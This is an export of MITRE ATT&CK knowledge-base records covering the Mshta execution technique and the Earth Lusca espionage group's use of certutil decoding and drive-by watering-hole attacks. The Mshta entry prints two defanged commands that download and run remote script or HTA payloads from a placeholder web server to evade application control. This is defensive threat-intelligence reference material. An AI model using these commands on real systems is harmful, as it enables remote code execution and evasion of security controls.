Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)

Files may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>

They may also be executed directly from URLs: <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1218.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Process: Process Creation', 'File: File Creation', 'Command: Command Execution', 'Network Traffic: Network Connection Creation']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [certutil](https://attack.mitre.org/software/S0160) to decode a string into a cabinet file.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--52a5b303-b759-424e-86b8-5c855976e5ea
revoked : False
technique : Deobfuscate/Decode Files or Information
technique_description : Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.

One such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)

Sometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1140
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS']
data_sources : ['Process: Process Creation', 'Script: Script Execution', 'File: File Modification']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022)

[Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has performed watering hole attacks.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--29a1fc8a-58c3-4465-b170-d9ec7c2d4d22
revoked : False
technique : Drive-by Compromise
technique_description : Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://attack.mitre.org/techniques/T1550/001).

Multiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)), including:

* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting
* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary
* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).

Often the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.(Citation: Shadowserver Strategic Web Compromise)

Typical drive-by compromise process:

1. A user visits a website that is used to host the adversary controlled content.
2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. 
    * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.
3. Upon finding a vulnerable version, exploit code is delivered to the browser.
4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.
    * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.

Unlike [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.

Adversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.(Citation: Volexity OceanLotus Nov 2017)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1189
matrix : mitre-attack
platform : ['Windows', 'Linux', 'macOS', 'SaaS']
data_sources : ['Application Log: Application Log Content', 'Network Traffic: Network Traffic Content', 'Process: Process Creation', 'File: File Creation', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------